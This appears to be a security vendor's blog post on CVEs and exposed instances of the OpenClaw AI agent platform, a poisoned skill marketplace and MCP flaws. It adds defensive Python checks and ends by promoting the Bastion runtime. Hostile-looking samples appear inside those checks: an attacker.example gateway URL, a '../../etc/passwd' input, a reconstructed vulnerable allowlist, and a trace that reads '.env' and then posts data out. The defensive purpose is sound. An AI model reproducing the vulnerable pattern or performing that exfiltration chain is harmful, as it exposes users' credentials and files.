OpenClaw crossed 135,000 GitHub stars in early 2026. Within weeks, security researchers disclosed a cascade of critical vulnerabilities that turned it into the first major AI agent security crisis of the year. Over 42,000 instances were found exposed on the public internet, a supply chain attack poisoned 20% of its skill marketplace, and at least 12 CVEs were published in under two months.
This isn’t just an OpenClaw problem. It’s a preview of what happens when AI agents go mainstream without runtime security.
The Vulnerabilities
ClawJacked: One Click to Full Agent Takeover
CVE-2026-25253 (CVSS 8.8) is the most widely reported. OpenClaw’s Control UI automatically trusted a gatewayURL query parameter and established a WebSocket connection that included the user’s authentication token without verifying origin. Any website could silently connect to a user’s local OpenClaw instance and take full control.
The root cause: OpenClaw assumed all localhost connections were implicitly trusted. A victim only needed to visit a malicious webpage. No plugins, no extensions, no additional interaction required.
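The standard defence for this bug class has two halves: the gateway refuses WebSocket upgrades whose Origin header is not on an explicit allowlist (and still demands its auth token on every connection, because non-browser clients can omit Origin), and the control UI refuses to hand its token to any gateway URL that is not same-origin with the page. The following is an added Python example, not OpenClaw's code; the port 18789, the token value and the sample handshakes are constructed for illustration.

```python
"""Origin and token checks for a localhost agent WebSocket endpoint.

Added example, not OpenClaw's code. It assumes a gateway listening on
127.0.0.1:18789 (placeholder port) whose control UI is served from that
same origin. A browser will open a WebSocket to localhost from ANY page
it is showing, so "the connection came from localhost" proves nothing
about which site started it.
"""
import hmac
from urllib.parse import urlsplit

# Origins that may open a WebSocket to this gateway from a browser.
ALLOWED_ORIGINS = {"http://127.0.0.1:18789", "http://localhost:18789"}


def check_ws_upgrade(headers, expected_token, allowed_origins=ALLOWED_ORIGINS):
    """Decide whether a WebSocket upgrade request may proceed.

    headers: lower-cased header name -> value, as parsed by the server.
    Returns (ok, reason).
    """
    if headers.get("upgrade", "").lower() != "websocket":
        return False, "not a websocket upgrade"

    origin = headers.get("origin")
    # Browsers always send Origin on a WebSocket handshake, so a
    # cross-origin page cannot hide where the connection came from.
    if origin is not None and origin.rstrip("/") not in allowed_origins:
        return False, f"cross-origin websocket rejected: {origin}"

    # Origin only stops browser-driven (CSRF-style) connections; a
    # non-browser client can omit or forge it, so every connection must
    # still present the gateway token. Constant-time comparison.
    supplied = headers.get("authorization", "").encode()
    if not hmac.compare_digest(supplied, f"Bearer {expected_token}".encode()):
        return False, "missing or invalid token"
    return True, "ok"


def gateway_url_allowed(candidate, page_origin):
    """Client-side rule: only connect to a gateway URL that is relative or
    same-origin with the page itself. A query parameter such as
    ?gatewayURL=wss://attacker.example/ws must not redirect the token."""
    c = urlsplit(candidate)
    if c.scheme == "" and c.netloc == "":
        return True  # relative path such as /ws is same-origin by construction
    p = urlsplit(page_origin)
    scheme_map = {"ws": "http", "wss": "https"}
    return scheme_map.get(c.scheme, c.scheme) == p.scheme and c.netloc == p.netloc


if __name__ == "__main__":
    token = "constructed-gateway-token"
    # Constructed handshake from the legitimate control UI.
    good = {"upgrade": "websocket", "origin": "http://127.0.0.1:18789",
            "authorization": f"Bearer {token}"}
    # Constructed handshake a browser would send on behalf of a foreign page.
    foreign = dict(good, origin="https://attacker.example")
    print(check_ws_upgrade(good, token))     # (True, 'ok')
    print(check_ws_upgrade(foreign, token))  # (False, 'cross-origin websocket rejected: https://attacker.example')
    print(gateway_url_allowed("wss://attacker.example/ws", "http://127.0.0.1:18789"))  # False
```

Note that the Origin check and the token check protect against different clients: Origin stops a browser acting on behalf of a foreign page, the token stops everything else. Dropping either one reopens the hole.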
Pre-Auth Voice RCE: No Credentials Needed
CVE-2026-28446 (CVSS 9.8) is the most severe. The voice-call extension’s inbound allowlist could be bypassed with an empty Caller ID and suffix matching. No authentication needed. Once exploited, an attacker could read the entire conversation history, every document the agent had processed, and every credential stored.
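The failure mode is worth seeing in code: every string ends with the empty string, so a suffix-based allowlist check that is handed an empty Caller ID matches every entry. The following is an added Python example, not OpenClaw's code; the vulnerable function is an illustrative reconstruction of the bug class the CVE describes, not the project's real source, and the allowlisted numbers are constructed.

```python
"""Inbound caller allowlist: the suffix-match bug class next to a strict check.

Added example, not OpenClaw's code. The vulnerable function is an
illustrative reconstruction of the bug class the CVE describes (an
empty Caller ID accepted, and matching by suffix), not the project's
real source; the numbers in the allowlist are constructed.
"""

ALLOWLIST = ["+15551234567", "+441632960000"]  # constructed sample numbers


def is_allowed_suffix(caller_id, allowlist=ALLOWLIST):
    """Vulnerable pattern: caller passes if its ID is a suffix of an entry.

    Every string ends with "", so an empty Caller ID matches every entry,
    and a short suffix such as "0000" matches as well.
    """
    caller_id = caller_id or ""
    return any(entry.endswith(caller_id) for entry in allowlist)


def normalize_e164(raw):
    """Reduce a caller ID to +<digits>, or None if it is not a usable number.

    Assumes the telephony provider delivers E.164-style numbers with a
    leading '+'; anything else (empty, anonymous, malformed) fails closed.
    """
    if raw is None:
        return None
    raw = raw.strip()
    if not raw.startswith("+"):
        return None
    digits = "".join(ch for ch in raw[1:] if ch.isdigit())
    if not 7 <= len(digits) <= 15:
        return None
    return "+" + digits


def is_allowed_strict(caller_id, allowlist=ALLOWLIST):
    """Hardened check: normalize both sides and require whole-number equality."""
    number = normalize_e164(caller_id)
    if number is None:
        return False
    allowed = {normalize_e164(entry) for entry in allowlist} - {None}
    return number in allowed


if __name__ == "__main__":
    for cid in ["", "0000", "+1 555 123 4567", "+15559999999"]:
        print(repr(cid), "suffix:", is_allowed_suffix(cid), "strict:", is_allowed_strict(cid))
```

The hardened version fails closed on anything it cannot normalize and compares whole numbers, so neither an empty ID nor a shared trailing digit sequence gets through.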
The Rest of the CVE List
| CVE | Type | Severity |
|---|---|---|
| CVE-2026-24763 | Command injection via Docker PATH | High |
| CVE-2026-25157 | OS command injection via SSH handler | High |
| CVE-2026-25475 | Path traversal / arbitrary file read | High |
| CVE-2026-28484 | Option injection RCE | High |
| + 6 more | SSRF, auth bypass, brute-force | Various |
No rate limits on failed passwords. No origin validation on WebSocket connections. No input sanitization on file paths. These aren’t exotic zero-days. They’re basic security hygiene failures, amplified by the fact that the system being exploited is an autonomous AI agent with access to tools, files, and credentials.
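Two of those hygiene checks, confining file reads to an allowed root and rate-limiting failed password attempts, fit in a few dozen lines. The following is an added Python example, not OpenClaw's code; the sandbox root, the lockout thresholds and the sample inputs are constructed.

```python
"""Two of the basic hygiene checks listed above: confining file reads to
an allowed root, and rate-limiting failed password attempts.

Added example, not OpenClaw's code. SANDBOX_ROOT, the lockout thresholds
and the sample inputs are constructed for illustration.
"""
import hmac
import os
import time
from pathlib import Path

# Directory the agent is allowed to read from (constructed; need not exist).
SANDBOX_ROOT = os.path.join(os.getcwd(), "agent_workspace")


def resolve_inside(root, user_path):
    """Return the resolved path of root/user_path, or raise PermissionError.

    The containment test runs AFTER resolving '..' and symlinks, because a
    lexical check on the raw string misses '..' hidden behind a symlink.
    """
    root_real = Path(root).resolve()
    if Path(user_path).is_absolute():
        raise PermissionError(f"absolute path rejected: {user_path}")
    try:
        target = (root_real / user_path).resolve()
    except (ValueError, OSError):  # e.g. embedded NUL byte
        raise PermissionError(f"unresolvable path rejected: {user_path!r}") from None
    try:
        target.relative_to(root_real)
    except ValueError:
        raise PermissionError(f"path escapes root: {user_path}") from None
    return str(target)


def is_inside(root, user_path):
    """Boolean form of resolve_inside for callers that only need a verdict."""
    try:
        resolve_inside(root, user_path)
        return True
    except PermissionError:
        return False


class FailedLoginLimiter:
    """Lock a key (client IP or username) after max_failures failures
    within window_seconds. The clock is injectable so it can be tested."""

    def __init__(self, max_failures=5, window_seconds=300, now=time.monotonic):
        self.max_failures = max_failures
        self.window = window_seconds
        self.now = now
        self._failures = {}  # key -> timestamps of recent failures

    def _recent(self, key):
        t = self.now()
        kept = [ts for ts in self._failures.get(key, []) if t - ts < self.window]
        self._failures[key] = kept
        return kept

    def is_locked(self, key):
        return len(self._recent(key)) >= self.max_failures

    def record_failure(self, key):
        self._recent(key).append(self.now())

    def record_success(self, key):
        self._failures.pop(key, None)


def attempt_login(limiter, key, supplied, expected):
    """Returns 'locked', 'denied' or 'ok'. Locked keys are refused before
    the password is even compared, so the window cannot be brute-forced."""
    if limiter.is_locked(key):
        return "locked"
    if hmac.compare_digest(supplied.encode(), expected.encode()):
        limiter.record_success(key)
        return "ok"
    limiter.record_failure(key)
    return "denied"


if __name__ == "__main__":
    print(is_inside(SANDBOX_ROOT, "notes/todo.txt"))    # True
    print(is_inside(SANDBOX_ROOT, "../../etc/passwd"))  # False
    clock = [1000.0]
    lim = FailedLoginLimiter(max_failures=3, window_seconds=60, now=lambda: clock[0])
    print([attempt_login(lim, "10.0.0.5", "guess", "s3cret") for _ in range(4)])
    # ['denied', 'denied', 'denied', 'locked']
    clock[0] += 61  # window expires, attempts are accepted again
    print(attempt_login(lim, "10.0.0.5", "s3cret", "s3cret"))  # ok
```

In an agent the path check belongs at the tool boundary, applied to every path the model hands a file tool, not only to paths typed by a human, since the model's input may itself have come from an untrusted document.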
Full CVE tracking: jgamblin/OpenClawCVEs
42,000 Instances Exposed
Multiple scanning teams found staggering numbers of publicly exposed OpenClaw instances:
- Bitsight: 30,000+
- SecurityScorecard: 40,000+
- Independent researcher Maor Dayan: 42,665 total
Of those, 93.4% had authentication bypass conditions and 12,812 were directly exploitable via RCE. The instances were spread across 52 countries, with the US and China hosting the largest concentrations.
These aren’t honeypots. These are production AI agent instances with real data, real credentials, and real tool access sitting wide open on the internet.
ClawHavoc: The Skill Marketplace Got Poisoned
If the CVEs weren’t enough, the OpenClaw skill marketplace (ClawHub) was massively compromised in what researchers called the “ClawHavoc” campaign:
- 1,184+ malicious skill packages discovered (approximately 20% of the entire registry)
- All delivered Atomic macOS Stealer (AMOS), targeting crypto exchange API keys, wallet private keys, SSH credentials, and browser passwords
- All malicious skills shared the same C2 infrastructure
- Disguised as crypto trading and wallet automation tools
- Social engineering tactics tricked users into executing commands
This is the AI agent equivalent of a compromised npm registry, except the “packages” have autonomous execution capabilities and access to your filesystem.
It’s Not Just OpenClaw
The MCP ecosystem has its own growing list:
- CVE-2025-6514 (CVSS 9.6): Full RCE in mcp-remote, affecting 437,000+ downloads. Command injection via OAuth flow.
- Smithery.ai breach: Path traversal exposed 3,000+ hosted MCP servers to arbitrary code execution and API key capture.
- Figma MCP Server (CVE-2025-53967): Command injection in a tool used by 100k+ developers monthly.
- 8,000+ MCP servers found exposed on the public internet with no authentication.
An analysis of 2,614 MCP implementations found 82% vulnerable to path traversal, 67% to code injection, and 34% to command injection.
LangChain got hit too. The “LangGrinch” vulnerability (CVE-2025-68664, CVSS 9.3) allowed attackers to steal all environment variables, including cloud credentials and database connection strings, through a serialization injection triggered by prompt injection.
Even Claude Code wasn’t immune. CVE-2025-59536 enabled RCE through malicious project configuration files.
The Pattern
Every major AI agent platform has now had a critical security incident. The attack patterns are consistent:
- Implicit trust assumptions. Localhost is trusted. Tool outputs are trusted. Skill packages are trusted. None of these assumptions hold when agents are autonomous.
- Missing input validation at every boundary. File paths, URLs, command parameters, OAuth endpoints. The basics that web security learned a decade ago haven’t made it into agent frameworks yet.
- Supply chain as the primary attack vector. ClawHub, Smithery, npm MCP packages. When agents install and execute third-party code autonomously, the supply chain becomes the attack surface.
- Agents amplify everything. A path traversal bug in a web app leaks one file. A path traversal bug in an AI agent leaks every file the agent has been told to process, plus its credentials, plus its conversation history, plus whatever tools it has access to.
OWASP has responded with both a Top 10 for Agentic Applications and an MCP Top 10. The EU AI Act’s high-risk system obligations take full effect on August 2, 2026. The industry is catching up, but deployments are moving faster than the standards.
What This Means
The OpenClaw crisis demonstrates something we’ve been arguing: request-level security is not enough for AI agents.
Checking individual API calls for malicious content doesn’t help when:
- The attack is a supply chain compromise that installs a backdoored skill
- The exploit is a WebSocket connection that bypasses content inspection entirely
- The exfiltration happens through a legitimate tool call with a path traversal payload
- The attack chain unfolds across multiple turns, each looking normal in isolation
AI agents need runtime security layers that:
- Inspect content at every boundary: tool inputs, tool outputs, model requests, model responses. Not just the initial prompt.
- Monitor sequences, not single requests: chain detection that catches multi-step attacks where each step looks benign.
- Enforce tool allowlists, not just blocklists: only permit explicitly declared tool sets per agent identity, rejecting everything else by default.
- Run locally: a cloud gateway can’t inspect localhost WebSocket traffic. A cloud gateway can’t see what tools your local agent is calling. The security layer needs to be where the agent is.
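The second and third of those requirements can be sketched as a small policy layer that sees every tool call: a per-agent allowlist enforced by default deny, and a chain rule that judges each call against the agent's recent history so a sequence of individually benign steps is still caught at its last step. The following is an added Python example, not Bastion's or OpenClaw's code; the agent identities, tool names, tool classes, sensitive-path markers and the sample call trace are all constructed.

```python
"""A miniature runtime policy layer for tool calls: per-agent allowlist
(default deny) and chain detection across turns.

Added example, not Bastion's or OpenClaw's code. Agent identities, tool
names, tool classes, the sensitive-path markers and the sample call
trace are all constructed for illustration.
"""
from collections import deque

# Tools each agent identity has explicitly declared. Absent tool -> denied.
TOOL_ALLOWLIST = {
    "docs-summarizer": {"read_file", "summarize"},
    "release-bot": {"read_file", "git_tag", "http_post"},
}

# Coarse classes the chain detector reasons over.
TOOL_CLASS = {
    "read_file": "read", "env_dump": "read",
    "http_post": "egress", "send_email": "egress",
    "summarize": "compute", "git_tag": "compute",
}

# Substrings that mark a read target as credential-bearing (constructed).
SENSITIVE_MARKERS = (".env", ".ssh/", "credentials", "token")


def is_sensitive_read(call):
    """True for a read-class tool call whose target looks credential-bearing."""
    if TOOL_CLASS.get(call["tool"]) != "read":
        return False
    target = str(call.get("args", {}).get("path", ""))
    return call["tool"] == "env_dump" or any(m in target for m in SENSITIVE_MARKERS)


class RuntimePolicy:
    def __init__(self, allowlist=TOOL_ALLOWLIST, window=5):
        self.allowlist = allowlist
        self.window = window  # recent allowed calls remembered per agent
        self.history = {}     # agent -> deque of allowed calls

    def decide(self, agent, call):
        """Return 'allow' or 'deny:<reason>' for one tool call.

        Each call is judged together with the agent's recent history, so a
        chain whose steps are individually benign (read a secret, then post
        somewhere) is still caught when its last step arrives.
        """
        allowed = self.allowlist.get(agent, set())  # unknown agent -> nothing allowed
        if call["tool"] not in allowed:
            return f"deny:tool_not_allowlisted:{call['tool']}"
        hist = self.history.setdefault(agent, deque(maxlen=self.window))
        if TOOL_CLASS.get(call["tool"]) == "egress" and any(is_sensitive_read(c) for c in hist):
            return "deny:chain:sensitive_read_then_egress"
        hist.append(call)
        return "allow"


def run_trace(policy, agent, trace):
    """Feed a sequence of calls (possibly spanning several turns) through the policy."""
    return [policy.decide(agent, call) for call in trace]


# Constructed trace: each step looks normal alone; the third completes an exfil chain.
SAMPLE_TRACE = [
    {"turn": 1, "tool": "read_file", "args": {"path": "CHANGELOG.md"}},
    {"turn": 2, "tool": "read_file", "args": {"path": ".env"}},
    {"turn": 3, "tool": "http_post", "args": {"url": "https://example.invalid/upload"}},
]

if __name__ == "__main__":
    print(run_trace(RuntimePolicy(), "release-bot", SAMPLE_TRACE))
    # ['allow', 'allow', 'deny:chain:sensitive_read_then_egress']
    print(RuntimePolicy().decide("docs-summarizer", SAMPLE_TRACE[2]))
    # deny:tool_not_allowlisted:http_post
```

The trace is the point: a request-level filter sees three ordinary calls, while the sequence rule sees a credential read followed by egress and refuses the egress. A real deployment would key the history on the agent identity and session and add content inspection of tool inputs and outputs at the same choke point.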
This is exactly what we’re building with Bastion: an open-source local AI security runtime that sits between your agent and the outside world, scanning for data leakage, prompt injection, suspicious tool chains, and multi-step attack patterns.
The question is no longer whether AI agents need security. OpenClaw just showed us what happens without it.
Bastion is open-source and runs locally as a sidecar proxy. No data leaves your machine. GitHub